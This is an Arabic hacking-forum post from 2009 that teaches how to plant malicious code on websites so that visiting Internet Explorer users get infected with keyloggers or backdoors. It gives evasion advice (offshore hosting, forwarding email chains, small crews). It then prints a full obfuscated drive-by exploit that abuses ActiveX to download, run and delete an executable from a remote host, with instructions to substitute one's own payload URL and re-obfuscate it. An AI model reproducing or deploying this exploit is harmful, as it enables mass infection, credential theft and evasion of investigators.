الســـلام عليكم شباب ...
اليوم حبيت اكتب هلموضوع على كيفية اختراق الأجهزه عن طريق مواقع الإنترنت ( منتديات اجنبية - مواقع يهودية او اجنبية - اي موقع الكتروني على الشبكة ) بإمكاننا نقوم بإختراق اجهزه الزوار ( سواء فايروس - لوجر - سيرفر مشفر ) ...
طبعا الامور هذه تحتاج شوية تفكير حلو من ناحية اول شي
طريقة التشفير
طريقة الفايروس ( سواء فايروس او لوجر او سيرفر مشفر )
طريقة تكييف السيرفر ( يعني الاولوية اشوفها انا بلامور هذه تكون كلوجر + باكدور صغير - port )
طريقة وضع الفايروس بلموقع.
طيب اللحين فهمنا المعطيات ... وش المطلوب ؟ ( الطريقة )
اولا التشفير + طريقة الفايروس .
التشفير بلمنتدى وخاصة بقسم اختراق الاجهزه والسيرفرات نلقى كثير من الادوات التشفيرية سواء قديمة ( متجدد تشفيرها ) او عن طريق الهيكس ( خلال فتره بسوي شرح لاكثر من طريقة لتشفير السيرفر بإذن الله , مسالة توفير وقت )
وفي شروحات كثيرة وبرامج كثيرة نلقاها بلمنتدى مشفره مثلا تشفير اخونا ThELeGanD لسيرفر ال Bifrost من هنا
طريقة الفايروس
الطريقة بصراحة متعددة وبعض الشباب يختلفوا بلراي هذا, من ناحية سيرفر اختراق ضحية - او لوجر صغير للباسووردات - او بورت نفتحه بجهاز الضحية من خلال الدوس يكون الاختراق ..
الامور هذه كلها ترجع للموقع اولا ومن ثم لزواره .. يعني على سبيل المثال لو كان الموقع ك Exchange server او يوفر خدمة الايميلات كل yahoo - hotmail - gmail - etc .. يفضل كي لوجر صغير جدا بحيث مايتعدى ال 5-10 كيلوبايت ...
لو كان كمنتدى ايضا يرجع لنفس المنتدى وش هو وهدفك من اختراقه ! مثلا منتدى حماية واختراق هذا ايضا يرجع لصاحب الاختراق وانا من راي لوجر ايضا ! بصراحة لا افضل اختراق السيرفرات والاجهزه بلامور هذه لانها صعب تمشي اوقات ووقتها قصير لتنكشف .
والبعض يقول اختراق اجهز ذا كان محدد على شخص او فريق معين .. وما انصح الطريقة هذه ايضا, لانه وقت تجي تخترق الضحية بللوجر اولا يجيك الايبي ادري حقه متجدد بإستمرار , طيب ليه مانستعمل الميتاسبلويت مثلا ؟ للاسف ندروا الي يستعملونه ولاكن إن شاء الله مع دورات سيكيورتي رولز وشبابها الطيبة والاساتذه الي فيها الجميع بيستخدم هلبرنامج ( مشروع الميتاسبلويت ) وحنا مستعدين لا سؤال او استفسار عن او مشكلة تواجهك فيه ...
طيب اللحين اتمنى تكون وصلت المعلومة من حيث وش هو برنامج بلإختراق وليش, والي يعارض الفكره شي يرجع له ولاكن هذه نصيحتي للجميع بصراحة ...
طريقة وضع الفايروس بلموقع.
نجي لمحور الموضوع الاساسي وهي كيفية وضع الفايروسات بلمواقع !, نسمع كثير عن مجموعة مخترقين ينشروا الفايروس بين الاجهزه وووالخ ... ولاكن ماسالنا ولا عرفنا الطريقة ؟
اولا وقبل اي شي شرحت سابقا وش البرنامج الي راح نعتمد عليه وشو الهدف من اختراق الموقع ؟ يعني ذا كنت ناوي تسحب ايميلات فقط شرحنا البرنامج المرشح للشي هذا .. وذا كنت مترصد لواحد او فريق معين بلمنتدى او الموقع ايضا شرحناالطريقة ولاكن كل واحد واسلوبة ...
بس دقيقة شوية شباب ؟ لو نحسبها مزبوط ونعرف شو النتائج منها راح تكون وخيمة ...
اولا كيف نغطي حالنا من اي دمج موقع ؟
عنوان موقع وهمي ويكون على داتا سنتر صينية - روسية - استرالية - سنجافورية .. وغيرها من البلدان الي توفرلك شبكة توصلك على الإنترنت ولاكن هدفنا منها انه قوانينها ماترتبط بلقوانين الامريكية .... ليش ؟
اولا خلال كم اسبوع - شهر تكون معلوماتك كاملة وجميع البلدان حول العالم متعاونين معها واولهم العربية ! يعني تخيلوا شباب لاسمح الله تجي شكوى عليكم بلامور هذه ؟ الفراش يدور عليك ! ومستعد يبيع اهله ليخدم الاعلى منه والاعلى منه نفس المبدا ولاكن عملية سياسية بتصفي الامور ... طيب اللحين نعرف انه فيه 3 انواع للهاكرز ( مالنا بلموضوع هذا من الكراكرز )
White hat
Grey hat
Black hat
ماراح افسر وش الالقاب هذه ولاكن ناخذ مثال بسيطة على الGray hat منهم ؟
Grey hat عباره عن شخص Hacker ملقب بل White hat طبعا معظمهم يحملون شهادة الC|EH لإدارة شركات تحت مسمى مصلحتهم ... لاكن اصحاب هذه الالقاب مايقدروا يقولوا لأصحاب الشركة او عملائها او زملائه على انه Grey hat ولاكن من تحت لتحت , اي بمعنى اصح يقوم هذا الشخص بعمل نسخة كاملة احتياطية عن الشركة وابواب كثيره له ك Back doors من حيث التمكن للشركة بحاله طرده - توقيفه - خلاف بينه وبين اصحاب الشركة ... مثال بسيط عليها شاهدت فلم يتكلم عن الهاكرز والWhite hat وال Black hat وال Grey hat بصراحة فلم جميل جدا خلافا عن الفلم الشهير HACKERS بحيث انه الفلم هذا رايي فيه 0% بجانب فلم UNTRACEABLE من ناحية تقنية المعلومات المستخدمة بلإضافة الى الادوات والحيل وكيفية الإختراق والتخفي خلافا عن ال Domain Regester للي حضروه اكيد يوافقوني ولمحبين الافلام للهاكرز والاكشن انصحكم بمشاهدة فلم Live free or DIE hard فلم قوي الصراحة ويحتوي على هاكرز والسواليف الي تخص حياتنا ....
اللحين بلمرحلة هذه من الهكرز ك Grey Hat تكون وظيفتنا بشركة مرموقة او نكون على اساس فريق White hat ومثالا عليه فريق Websense® ووظيفتهم كفريق امني يقوم بفحص وتتبع المواقع الشهيره ك MSN - Yahoo - Google - وغيره من المواقع الكبيره الشهيره بزوارها ... حيث قام هذا الفريق البارحة 10-6-2009 بلإبلاغ عن وجود ثغره ( درسنا اليوم ) شيفرات خبيثة داخل موقع الهوتميل الكندي sympatico.msn.ca
[IMG]http://securitylabs.websense.com/*******/Assets/*****Media/compromised_site.png[/IMG]
وقاموا بشرح ومحاولة تتبع الهاكرز الذين قامو بوضع هذه الشيفرات الخبيثة Java script -
يقوم بلتحويل لموقع يحتوي على شيفرات اخرى خبيثة تادي الى ضرر وسحب معلومات الزوار للموقع ...
[http://quebec.kijiji.ca/]
ونشوف تعليقهم طبعا وفخرهم على الشي هذا ( طبعا من خلال تقارير كاملة ومستمره وقوية بلشكل هذا شي بديهي وطبيعي ان يقوموا الشركات بطلب الحماية من قبلهم وإشرافهم على مواقعهم بشكل دوري وشهري وتعاقدهم سنويا معهم ... وتوقعوا المبالغ الي يحصلونها منهم ,, فطبعا خلال محاولتهم لتتبع المخترقين لهذا الموقع ماقدروا كونه كان مصدره غير تابع او موثوق منهم ( طريقتهم بلتخفي ) طبعا لا اعلم عنها شي ...
طولت بلتعبير على الموضوع ولاكن لاهميته ولاقنع الشباب انهم يبعدوا على الداتا سنتر الامريكية او اي بلد تحت الامريكان .. لانه بلاول والنهاية مصلحتكم وذمتكم برقبتنا ...
طيب اللحين عرفنا واقتنعنا انه الداتا سنتر الي ناخذ منها كما وضحت يافراس .. نجي للشي الثاني وهي كيف نغطي حالنا من الامور هذه ؟ يعني بحالة لاسمح الله وصلوا لمعلومات بتهددنا شوية .. ولاكن في طرق وتقنيات جديدة صعب جدا ناس يوصل لك من خلال .. واساسا انا اعرف القليل منها ولاكن مو حلو اشرح شي ماني فاهمه ... فلافضل انبهكم لها وصديقكم جوجل ماببخل عليكم باي معلومة ...
اولا الايميل المرسل له اللوجر - التبليغ مايكون على اي شركة امريكية ! الايميل - الموقع - السيرفر نفس عملية الداتا سنتر ! اي مركز توفير بريدي يسجل لك الايبي حقك ومااعتقد يجي يوم وماتغلط وتفوت بلايبي حقك !
هنا فهمنا انه اولا الموقع مايكون على داتاسنتر اجنبية
ثانية مايكون البريد على داتا سنتر اجنبية
ثالث شي والاهم محاولة توهيم المتتبعين النا ليوصلولنا ؟ كيف ؟
اولا البريد نسوي 3 حسابات على شركات مختلفة ( طبعا ماتكون على داتا سنتر امريكية )
ونسوي للبريد الي يوصلنا Forward له بحيث مانفوت اساسا البريد الاول ولا الثاني ولا الثالث .. او نفوت اي واحد حنا نفضله وبصراحة مابقدر اشرح اكثر من هاي الطريق لانه في طرق كثير لتوهيم - تشتيت الملاحقين لك عن طريق البريد واكيد معظم الشباب يعرفوها ..
ثانيا اذا لاحظتوا تركيزي كان على اللوجر .. لانه بصراحة ماتوقع في طريقة لتتصل فيها على الضحية ولو كان هذا الضحية مراقب من قبل اي مركز امني للمعلومات راح يوصلوا لك بكل سهولة ... لانه اختراق الاجهزه ماله علاقه بلبروكسيات ( proxy4 proxy5 etc )
ففضلت الكي لوجر على جميع الطرق لسهولة وامان تتبعه ... طبعا معظمكم يقلي نقدر نضلل الي يتبعونا عن طريق الVPN Proxy ووووالخ من الشبكات الي تدعمها البروكسيات .. ولاكن مثل ماقلت الداتا سنتر الاول والنهاية اهم من البروكسي ! ثانيا ماجربتها من قبل او سمعت انها امنة, فما اقدر افيدكم فيها ... ولاكن اقول الافضل انه نقوم بإستعمال هذه الشبكات ومن ثم بروكسي اخي لتصفح البريد المختار ( من بين الثلاثة الي وضحناهم قبل ) ومن ثم الامان بالله بلاول والنهاية ... وتذكروا شباب غلطة الشاط بعشره ! كيف ؟
كثير اصدقاء لي بدون ذكر اسامي لانهم والله كثار واكثر من اخوان بعد ويعرفون نفسهم نتحاكى اوقات علمسنجر - ICQ - IRC ويعرفوني من اكثر من سنتين اوثلاث غير الاقدم .. يفكرون بينهم وبين انفسهم مثل ما انا افكر فيهم اكيد هم يفكرون فيني من ناحية وش الي حصلته يا فراس ؟ وش سويت ؟ وش نتائجك غير الاختراقات والسواليف الطفولية هذه ؟ او نقدر نسميها مرحلة الطفولة مثل ماكل طفل يمر بهلمرحلة الإنترنت ( Hacking ) له نفس المبدا ...
بس بصراحة ماحب اقول اي شي الا بلامور المحدودة او رؤوس اقلام عليها ... لانه ماتضمن الصحبة وش نهايتها ؟ الشيطان ابن *** ايضا .. يعني صار ماصار .... الخ .. فلي اوضحة حاليا هو ماتفضح نفسك بنفسك .. مثل مايقول المثل مايحسد المال غير صحابه .. يروح واحد من الشباب تجيه كم قرش من النت يفضح نفسه على انه سيد الفهمانين بين الشباب وانا وانا .. هذا اذا صدقوه اساسا ... تلقاهم يواسونه ويقولون من وراك هبيله وكذاب ومايطلع منك .. طيب ليه تفضح نفسك لهم ؟ ليه تقول ؟ هنا اقلك تحمل غلطتك من نفسك والغلطة هذه بغلطة حياتك ذا كنت مطلوب او مسوي كركبة على النت ...
فلافضل المجموعة الي تكون معهم مايزيدوا على ثلاثة والاحسن 2 فقط !
ثالثا الحين بعد الكلام هذا ان شاء الله تكون الصورة من ناحية الامان وتشتيت الملاحقين لينا وصلت .. ونرجع اللحين للكود حقنا الي نقوم بدمجه بلمواقع ...
طبعا الكود يمشي معنا على صفحات .html او .php وغيره تقدر انت وجوجل يعلمك علبرمجة وكيف تسوي كودك وتشفره بكيفك ...
كود:
</html>
**********
var dc=********.write;
var sc=String.fromCharCode;
var exe="http://www.j0.com/pentest.exe";
dc(sc(60,115,99,114,105,112,116,62,118,97,114,32,97,105,108,105,97,110,44,122,104,97,110,44,99,109,100,115,115,59,97,105,108,105,97,110,61,34) + exe + sc(34,59,122,104,97,110,61,34,119,105,110,46,101,120,101,34,59,99,109,100,115,115,61,34,99,109,100,46,101,120,101,34,59,116,114,121,123,118,97,114,32,97,100,111,61,40,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,111,98,106,101,99,116,34,41,41,59,118,97,114,32,100,61,49,59,97,100,111,46,115,101,116,65,116,116,114,105,98,117,116,101,40,34,99,108,97,115,115,105,100,34,44,34,99,108,115,105,100,58,66,68,57,54,67,53,53,54,45,54,53,65,51,45,49,49,68,48,45,57,56,51,65,45,48,48,67,48,52,70,67,50,57,69,51,54,34,41,59,118,97,114,32,101,61,49,59,118,97,114,32,120,109,108,61,97,100,111,46,67,114,101,97,116,101,79,98,106,101,99,116,40,34,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,34,44,34,34,41,59,118,97,114,32,102,61,49,59,118,97,114,32,108,110,61,34,65,100,111,34,59,118,97,114,32,108,122,110,61,34,100,98,46,83,116,34,59,118,97,114,32,97,110,61,34,114,101,97,109,34,59,118,97,114,32,103,61,49,59,118,97,114,32,97,115,61,97,100,111,46,99,114,101,97,116,101,111,98,106,101,99,116,40,108,110,43,108,122,110,43,97,110,44,34,34,41,59,118,97,114,32,104,61,49,59,120,109,108,46,79,112,101,110,40,34,71,69,84,34,44,97,105,108,105,97,110,44,48,41,59,120,109,108,46,83,101,110,100,40,41,59,97,115,46,116,121,112,101,61,49,59,118,97,114,32,110,61,49,59,97,115,46,111,112,101,110,40,41,59,97,115,46,119,114,105,116,101,40,120,109,108,46,114,101,115,112,111,110,115,101,66,111,100,121,41,59,97,115,46,115,97,118,101,116,111,102,105,108,101,40,122,104,97,110,44,50,41,59,97,115,46,99,108,111,115,101,40,41,59,118,97,114,32,115,104,101,108,108,61,97,100,111,46,99,114,101,97,116,101,111,98,106,101,99,116,40,34,83,104,101,108,108,46,65,112,112,108,105,99,97,116,105,111,110,34,44,34,34,41,59,115,104,101,108,108,46,83,104,101,108,108,69,120,101,99,117,116,101,40,122,104,97,110,44,34,34,44,34,34,44,34,111,112,101,110,34,44,48,41,59,115,104,101,108,108,46,83,104,101,108,108,69,120,101,99,117,116,101,40,99,109,100,115,115,44,34,32,47,99,32,100,101,108,32,47,83,32,47,81,32,47,70,32,34,43,122,104,97,110,44,34,34,44,34,111,112,101,110,34,44,48,41,59,125,99,97,116,99,104,40,101,41,123,125,59,60,47,115,99,114,105,112,116,62));
</script>
<body>
Hi ! , this page contain an IE6 exploit ./j0rd4n14n.r1z ...
</body>
طبعا هذا الكود كل الي عليكم التعامل فيه 3 امور :
1- تغيير رابط السيرفر
http://www.j0.com/pentest.exe
الي رابط سيرفركم ( مثل ماقلت افضل للجميع لوجر صغير اقل من 20 كيلوبيت او 10 يكون افضل ).
2- تغيير الكود الخبيث او بمعنى اصح ( التشفيره له ) هذا كود مشفر ( مثال عليه )
كود:
+ exe + sc(34,59,122,104,97,110,61,34,119,105,110,46,101,120,101,34,59,99,109,100,115,115,61,34,99,109,100,46,101,120,101,34,59,116,114,121,123,118,97,114,32,97,100,111,61,40,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,111,98,106,101,99,116,34,41,41,59,118,97,114,32,100,61,49,59,97,100,111,46,115,101,116,65,116,116,114,105,98,117,116,101,40,34,99,108,97,115,115,105,100,34,44,34,99,108,115,105,100,58,66,68,57,54,67,53,53,54,45,54,53,65,51,45,49,49,68,48,45,57,56,51,65,45,48,48,67,48,52,70,67,50,57,69,51,54,34,41,59,118,97,114,32,101,61,49,59,118,97,114,32,120,109,108,61,97,100,111,46,67,114,101,97,116,101,79,98,106,101,99,116,40,34,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,34,44,34,34,41,59,118,97,114,32,102,61,49,59,118,97,114,32,108,110,61,34,65,100,111,34,59,118,97,114,32,108,122,110,61,34,100,98,46,83,116,34,59,118,97,114,32,97,110,61,34,114,101,97,109,34,59,118,97,114,32,103,61,49,59,118,97,114,32,97,115,61,97,100,111,46,99,114,101,97,116,101,111,98,106,101,99,116,40,108,110,43,108,122,110,43,97,110,44,34,34,41,59,118,97,114,32,104,61,49,59,120,109,108,46,79,112,101,110,40,34,71,69,84,34,44,97,105,108,105,97,110,44,48,41,59,120,109,108,46,83,101,110,100,40,41,59,97,115,46,116,121,112,101,61,49,59,118,97,114,32,110,61,49,59,97,115,46,111,112,101,110,40,41,59,97,115,46,119,114,105,116,101,40,120,109,108,46,114,101,115,112,111,110,115,101,66,111,100,121,41,59,97,115,46,115,97,118,101,116,111,102,105,108,101,40,122,104,97,110,44,50,41,59,97,115,46,99,108,111,115,101,40,41,59,118,97,114,32,115,104,101,108,108,61,97,100,111,46,99,114,101,97,116,101,111,98,106,101,99,116,40,34,83,104,101,108,108,46,65,112,112,108,105,99,97,116,105,111,110,34,44,34,34,41,59,115,104,101,108,108,46,83,104,101,108,108,69,120,101,99,117,116,101,40,122,104,97,110,44,34,34,44,34,34,44,34,111,112,101,110,34,44,48,41,59,115,104,101,108,108,46,83,104,101,108,108,69,120,101,99,117,116,101,40,99,109,100,115,115,44,34,32,47,99,32,100,101,108,32,47,83,32,47,81,32,47,70,32,34,43,122,104,97,110,44,34,34,44,34,111,112,101,110,34,44,48,41,59,125,99,97,116,99,104,40,101,41,123,125,59,60,47,115,99,114,105,112,116,62));
طبعا لتغيير الشيفره للكود حسب رغبتكم يوجد مواقع كثيرة تقدم خدمخ التشفير ومنها
كود:
http://www.dynamicdrive.com/dynamicindex9/encrypter.htm
طبعا الكود يتماشي ويصيب متصفح الإنترنت اكسبلويرر 7 او 6 .. والسيرفر مثلا مثل ماذكرت حق اخونا LeGenD من هنا .
طبعا لاتنسوا شباب انه صفحة الhtml او php راح تكون مكشوفة مع متصفحة الإنترنت إكسبلويرر مثل ماذكرت ولاكن عليكم تشفير الصفحة مثل ماقلت سابقا من رابط التشفير .
طبعا الموضوع خاص لشباب منتدى سيكيورتي رولز وطلاب الدورة الاعزاء .. وإن شاء الله خلال وقت فراغي اكتب دروس تتعلق بامور اقوى حصرية لشباب سيكيورتي رولز من حيث كيفية اختراق الانظمة والفايروسات وكيفية تكوينها والتعامل معها .
تحياتي .
منقول للفائدة
;dtdm prk hgl,hru fh;,h] ofdem ! lil g;g lojvr >
06-23-2009, 01:19 AM
كيفية حقن المواقع باكواد خبيثة ! مهم لكل مخترق . 
المواضيع المتشابهه 
العرض العادي
